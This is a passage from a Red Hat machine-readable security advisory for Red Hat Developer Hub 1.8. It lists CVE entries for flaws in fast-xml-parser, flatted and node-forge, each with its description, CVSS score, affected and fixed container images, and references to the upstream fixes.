"https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6", "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6"}, {"category": "external", "summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r", "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r"}], "release_date": "2026-03-20T05:17:03.290000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Moderate"}], "title": "fast-xml-parser: fast-xml-parser: Denial of Service via XML entity expansion bypass"}, {"cve": "CVE-2026-33228", "cwe": {"id": "CWE-915", "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"}, "discovery_date": "2026-03-21T00:01:43.424803+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2449872"}], "notes": [{"category": "description", "text": "A flaw was found in flatted, a JavaScript Object Notation (JSON) parser designed for handling circular data structures. A remote attacker can exploit this vulnerability by providing specially crafted JSON input. The parse() function in flatted fails to properly validate string values used as array index keys, allowing an attacker to manipulate internal JavaScript object prototypes. This prototype pollution can enable an attacker to execute arbitrary code or cause a denial of service, impacting the availability and integrity of affected systems.", "title": "Vulnerability description"}, {"category": "summary", "text": "flatted: Flatted: Prototype pollution vulnerability allows arbitrary code execution via crafted JSON.", "title": "Vulnerability summary"}, {"category": "other", "text": "A Critical vulnerability was discovered in 'flatted', a JavaScript JSON parser. It could enable a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service. Exploitation involves prototype pollution by providing a specially crafted JSON input. Red Hat products that process un-trusted JSON data and utilize the 'flatted' library are at risk if they do not properly sanitize input.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-33228"}, {"category": "external", "summary": "RHBZ#2449872", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449872"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33228", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33228"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33228"}, {"category": "external", "summary": "https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802", "url": "https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802"}, {"category": "external", "summary": "https://github.com/WebReflection/flatted/releases/tag/v3.4.2", "url": "https://github.com/WebReflection/flatted/releases/tag/v3.4.2"}, {"category": "external", "summary": "https://github.com/WebReflection/flatted/security/advisories/GHSA-rf6f-7fwh-wjgh", "url": "https://github.com/WebReflection/flatted/security/advisories/GHSA-rf6f-7fwh-wjgh"}], "release_date": "2026-03-20T23:06:48.485000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Critical"}], "title": "flatted: Flatted: Prototype pollution vulnerability allows arbitrary code execution via crafted JSON."}, {"cve": "CVE-2026-33891", "cwe": {"id": "CWE-606", "name": "Unchecked Input for Loop Condition"}, "discovery_date": "2026-03-27T21:01:34.410210+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2452450"}], "notes": [{"category": "description", "text": "A flaw was found in the node-forge library, a JavaScript implementation of Transport Layer Security. This vulnerability, inherited from the bundled jsbn library, allows a remote attacker to cause a Denial of Service (DoS). When the BigInteger.modInverse() function is called with a zero value, it enters an infinite loop, causing the process to hang indefinitely and consume 100% of the CPU resources.", "title": "Vulnerability description"}, {"category": "summary", "text": "node-forge: node-forge: Denial of Service via infinite loop in BigInteger.modInverse()", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-33891"}, {"category": "external", "summary": "RHBZ#2452450", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452450"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33891", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33891"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33891", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33891"}, {"category": "external", "summary": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023", "url": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023"}, {"category": "external", "summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx"}], "release_date": "2026-03-27T20:43:37.725000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "node-forge: node-forge: Denial of Service via infinite loop in BigInteger.modInverse()"}, {"cve": "CVE-2026-33894", "cwe": {"id": "CWE-347", "name": "Improper Verification of Cryptographic Signature"}, "discovery_date": "2026-03-27T21:02:52.462999+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2452464"}], "notes": [{"category": "description", "text": "A flaw was found in Forge (also called `node-forge`), a JavaScript implementation of Transport Layer Security. A remote attacker could exploit weaknesses in the RSASSA PKCS#1 v1.5 signature verification process. By crafting malicious signatures that include extra data within the ASN structure and do not meet padding requirements, an attacker can bypass signature validation. This allows for the creation of forged signatures that appear legitimate, potentially compromising the integrity and authenticity of communications.", "title": "Vulnerability description"}, {"category": "summary", "text": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-33894"}, {"category": "external", "summary": "RHBZ#2452464", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452464"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33894", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33894"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"}, {"category": "external", "summary": "https://datatracker.ietf.org/doc/html/rfc2313#section-8", "url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"}, {"category": "external", "summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"}, {"category": "external", "summary": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE", "url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"}, {"category": "external", "summary": "https://www.rfc-editor.org/rfc/rfc8017.html", "url": "https://www.rfc-editor.org/rfc/rfc8017.html"}], "release_date": "2026-03-27T20:45:49.583000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification"}, {"cve": "CVE-2026-33895", "cwe": {"id": "CWE-347", "name": "Improper Verification of Cryptographic Signature"}, "discovery_date": "2026-03-27T21:02:18.484291+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2452457"}], "notes": [{"category": "description", "text": "A flaw was found in Forge (also called `node-forge`), a JavaScript library used for Transport Layer Security (TLS). The library's Ed25519 signature verification process does not correctly validate cryptographic signatures, allowing forged non-canonical signatures to be accepted. A remote attacker could exploit this signature malleability to bypass authentication and authorization logic. This vulnerability can also circumvent security checks in applications that rely on the uniqueness of cryptographic signatures for functions such as deduplication or preventing replay attacks.", "title": "Vulnerability description"}, {"category": "summary", "text": "node-forge: Forge: Authentication bypass via forged Ed25519 cryptographic signatures", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-33895"}, {"category": "external", "summary": "RHBZ#2452457", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452457"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33895", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33895"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33895", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33895"}, {"category": "external", "summary": "https://datatracker.ietf.org/doc/html/rfc8032#section-8.4", "url": "https://datatracker.ietf.org/doc/html/rfc8032#section-8.4"}, {"category": "external", "summary": "https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85", "url": "https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85"}, {"category": "external", "summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw"}], "release_date": "2026-03-27T20:47:54.492000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "node-forge: Forge: Authentication bypass via forged Ed25519 cryptographic signatures"}, {"cve": "CVE-2026-33896", "cwe": {"id": "CWE-295", "name": "Improper Certificate Validation"}, "discovery_date": "2026-03-27T21:02:22.762233+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2452458"}], "notes": [{"category": "description", "text": "A flaw was found in Forge (also known as node-forge), a JavaScript implementation of Transport Layer Security (TLS). The `pki.verifyCertificateChain()` function does not properly enforce certificate validation rules. This oversight allows an intermediate certificate that lacks specific security extensions to enable any leaf certificate to function as a Certificate Authority (CA) and sign other certificates. Consequently, node-forge could accept these unauthorized certificates as valid, potentially leading to spoofing or the issuance of illegitimate certificates.", "title": "Vulnerability description"}, {"category": "summary", "text": "node-forge: Forge (node-forge): Certificate validation bypass allows unauthorized certificate issuance", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-33896"}, {"category": "external", "summary": "RHBZ#2452458", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452458"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33896", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33896"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33896", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33896"}, {"category": "external", "summary": "https://github.com/digitalbazaar/forge/commit/2e492832fb25227e6b647cbe1ac981c123171e90", "url": "https://github.com/digitalbazaar/forge/commit/2e492832fb25227e6b647cbe1ac981c123171e90"}, {"category": "external", "summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-2328-f5f3-gj25", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-2328-f5f3-gj25"}], "release_date": "2026-03-27T20:50:03.418000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "node-forge: Forge (node-forge): Certificate validation bypass allows unauthorized certificate issuance"}, {"cve": "CVE-2026-39983", "cwe": {"id": "CWE-93", "name": "Improper Neutralization of CRLF Sequences ('CRLF Injection')"}, "discovery_date": "2026-04-09T18:02:16.209487+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": 